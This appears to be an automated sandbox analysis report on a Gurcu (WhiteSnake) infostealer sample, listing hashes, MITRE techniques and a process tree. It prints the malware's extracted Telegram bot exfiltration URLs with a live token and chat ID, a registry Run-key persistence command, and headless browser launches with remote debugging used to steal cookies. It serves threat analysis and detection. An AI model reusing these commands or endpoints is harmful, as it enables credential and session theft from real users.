gurcu | 28828524d62ba090c2a5a558afee71c10d4b4db87c6d73e074698ef4395b8bdc

Analysis

max time kernel
104s
max time network
138s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
06/04/2025, 19:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

generated21.exe
Size

2.8MB
MD5

2ee4087423cdcc9ef14519db15f627b6
SHA1

104667f7a390ce8d36a384365d6cca93dbff402f
SHA256

28828524d62ba090c2a5a558afee71c10d4b4db87c6d73e074698ef4395b8bdc
SHA512

9f68b9e4136cb60eb42729b58097b9185a833b77bb5a253d5492ba259f50cd1ec4ebda1f37184aada58c9f39eb6e02b48964e41e6deb5dc57a2305bcdd6f76eb
SSDEEP

49152:ws0IXxtkqXfd+/9A9Acc125Zsl5hanCLm/+axysYC6syUkoPaPS2AJNySUP7k:wF6xtkqXf0FZjGsJWCLmctClVkoOSfJ0

Score

10^/10

gurcu credential_access discovery persistence spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/sendMessage?chat_id=6565043849

https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/sendDocument?chat_id=6565043849&caption=%F0%9F%A5%A0Cookies%20from%20these%20websites%20%5Bgmail.com%20github.com%20%5D%20were%20successfully%20grabbed%20from%20the%20Default%20profile%20of%20Chrom

https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/getUpdates?offset=-

Signatures

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu

Uses browser remote debugging 2 TTPs 10 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
792	msedge.exe
4872	msedge.exe
4084	msedge.exe
4248	chrome.exe
876	chrome.exe
3264	chrome.exe
3108	chrome.exe
2268	chrome.exe
4936	msedge.exe
2488	msedge.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	generated21.exe
Key value queried	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation	Updater.exe

Executes dropped EXE 2 IoCs

pid	Process
2168	Updater.exe
3584	Updater.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsEdgeUpdate = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdater\\Updater.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
13	raw.githubusercontent.com
15	raw.githubusercontent.com
33	raw.githubusercontent.com
45	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
3440	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
3784	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4212	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
4168	generated21.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
2168	Updater.exe
4248	chrome.exe
4248	chrome.exe
3584	Updater.exe
3584	Updater.exe
3584	Updater.exe
3584	Updater.exe
3584	Updater.exe
3584	Updater.exe
3584	Updater.exe
3584	Updater.exe
3584	Updater.exe
3584	Updater.exe
3584	Updater.exe
3584	Updater.exe
3584	Updater.exe
3584	Updater.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
4248	chrome.exe
792	msedge.exe
792	msedge.exe
792	msedge.exe
792	msedge.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeDebugPrivilege	4168	generated21.exe
Token: SeDebugPrivilege	3440	tasklist.exe
Token: SeDebugPrivilege	2168	Updater.exe
Token: SeDebugPrivilege	3584	Updater.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe
Token: SeShutdownPrivilege	4248	chrome.exe
Token: SeCreatePagefilePrivilege	4248	chrome.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4248	chrome.exe
792	msedge.exe
792	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4168 wrote to memory of 3108	4168	generated21.exe	95
PID 4168 wrote to memory of 3108	4168	generated21.exe	95
PID 3108 wrote to memory of 1600	3108	cmd.exe	97
PID 3108 wrote to memory of 1600	3108	cmd.exe	97
PID 3108 wrote to memory of 3440	3108	cmd.exe	98
PID 3108 wrote to memory of 3440	3108	cmd.exe	98
PID 3108 wrote to memory of 5048	3108	cmd.exe	99
PID 3108 wrote to memory of 5048	3108	cmd.exe	99
PID 3108 wrote to memory of 3784	3108	cmd.exe	100
PID 3108 wrote to memory of 3784	3108	cmd.exe	100
PID 3108 wrote to memory of 2168	3108	cmd.exe	101
PID 3108 wrote to memory of 2168	3108	cmd.exe	101
PID 2168 wrote to memory of 540	2168	Updater.exe	105
PID 2168 wrote to memory of 540	2168	Updater.exe	105
PID 540 wrote to memory of 4212	540	cmd.exe	107
PID 540 wrote to memory of 4212	540	cmd.exe	107
PID 4872 wrote to memory of 3584	4872	cmd.exe	110
PID 4872 wrote to memory of 3584	4872	cmd.exe	110
PID 2168 wrote to memory of 4248	2168	Updater.exe	111
PID 2168 wrote to memory of 4248	2168	Updater.exe	111
PID 4248 wrote to memory of 1384	4248	chrome.exe	112
PID 4248 wrote to memory of 1384	4248	chrome.exe	112
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 100	4248	chrome.exe	113
PID 4248 wrote to memory of 1108	4248	chrome.exe	114
PID 4248 wrote to memory of 1108	4248	chrome.exe	114
PID 4248 wrote to memory of 736	4248	chrome.exe	115
PID 4248 wrote to memory of 736	4248	chrome.exe	115
PID 4248 wrote to memory of 736	4248	chrome.exe	115
PID 4248 wrote to memory of 736	4248	chrome.exe	115
PID 4248 wrote to memory of 736	4248	chrome.exe	115
PID 4248 wrote to memory of 736	4248	chrome.exe	115
PID 4248 wrote to memory of 736	4248	chrome.exe	115
PID 4248 wrote to memory of 736	4248	chrome.exe	115
PID 4248 wrote to memory of 736	4248	chrome.exe	115
PID 4248 wrote to memory of 736	4248	chrome.exe	115

C:\Users\Admin\AppData\Local\Temp\generated21.exe
"C:\Users\Admin\AppData\Local\Temp\generated21.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4168
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpAC5D.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpAC5D.tmp.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3108
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:1600
- - C:\Windows\system32\tasklist.exe
    Tasklist /fi "PID eq 4168"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:3440
- - C:\Windows\system32\find.exe
    find ":"
    3⤵
    PID:5048
- - C:\Windows\system32\timeout.exe
    Timeout /T 1 /Nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:3784
- - C:\Users\Admin\AppData\Local\AdobeUpdater\Updater.exe
    "C:\Users\Admin\AppData\Local\AdobeUpdater\Updater.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2168
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MsEdgeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Local\AdobeUpdater\Updater.exe /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:540
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MsEdgeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Local\AdobeUpdater\Updater.exe /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:4212
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-pre-commit-input --disable-background-networking --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-component-extensions-with-background-pages --disable-component-update --disable-default-apps --disable-dev-shm-usage --disable-extensions --disable-field-trial-config --disable-hang-monitor --disable-infobars --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-search-engine-choice-screen --disable-sync --enable-automation --enable-blink-features=IdleDetection --export-tagged-pdf --generate-pdf-document-outline --force-color-profile=srgb --metrics-recording-only --no-first-run --password-store=basic --use-mock-keychain --disable-features=Translate,AcceptCHFrame,MediaRouter,OptimizationHints,ProcessPerSiteUpToMainFrameThreshold --enable-features= --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --headless=new --hide-scrollbars --mute-audio about:blank --window-position=-2400,-2400 --profile-directory=Default --remote-debugging-port=0
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:4248
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7fffafdbdcf8,0x7fffafdbdd04,0x7fffafdbdd10
        5⤵
        
        PID:1384
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-breakpad --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2004,i,12952613804931350538,8285348388893365526,262144 --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1860 /prefetch:2
        5⤵
        
        PID:100
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2248,i,12952613804931350538,8285348388893365526,262144 --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2244 /prefetch:3
        5⤵
        
        PID:1108
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2456,i,12952613804931350538,8285348388893365526,262144 --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2452 /prefetch:8
        5⤵
        
        PID:736
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,12952613804931350538,8285348388893365526,262144 --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3148 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3264
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,12952613804931350538,8285348388893365526,262144 --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3184 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:876
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3700,i,12952613804931350538,8285348388893365526,262144 --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3704 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3108
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4692,i,12952613804931350538,8285348388893365526,262144 --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4688 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2268
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --allow-pre-commit-input --disable-background-networking --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-component-extensions-with-background-pages --disable-component-update --disable-default-apps --disable-dev-shm-usage --disable-extensions --disable-field-trial-config --disable-hang-monitor --disable-infobars --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-search-engine-choice-screen --disable-sync --enable-automation --enable-blink-features=IdleDetection --export-tagged-pdf --generate-pdf-document-outline --force-color-profile=srgb --metrics-recording-only --no-first-run --password-store=basic --use-mock-keychain --disable-features=Translate,AcceptCHFrame,MediaRouter,OptimizationHints,ProcessPerSiteUpToMainFrameThreshold --enable-features= --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --headless=new --hide-scrollbars --mute-audio about:blank --window-position=-2400,-2400 --profile-directory=Default --remote-debugging-port=0
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:792
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x248,0x24c,0x250,0x244,0x258,0x7fffadd8f208,0x7fffadd8f214,0x7fffadd8f220
        5⤵
        
        PID:1956
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-breakpad --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2256,i,5820526066243649127,12638862669748880211,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=2248 /prefetch:2
        5⤵
        
        PID:3920
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2280,i,5820526066243649127,12638862669748880211,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=2276 /prefetch:3
        5⤵
        
        PID:3472
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2788,i,5820526066243649127,12638862669748880211,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=2784 /prefetch:8
        5⤵
        
        PID:3644
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3324,i,5820526066243649127,12638862669748880211,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=3320 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4936
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3340,i,5820526066243649127,12638862669748880211,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=3328 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4872
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --message-loop-type-ui --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4024,i,5820526066243649127,12638862669748880211,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=4020 /prefetch:8
        5⤵
        
        PID:4280
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --message-loop-type-ui --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4640,i,5820526066243649127,12638862669748880211,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=4636 /prefetch:8
        5⤵
        
        PID:1384
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --message-loop-type-ui --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4784,i,5820526066243649127,12638862669748880211,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=4780 /prefetch:8
        5⤵
        
        PID:2932
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
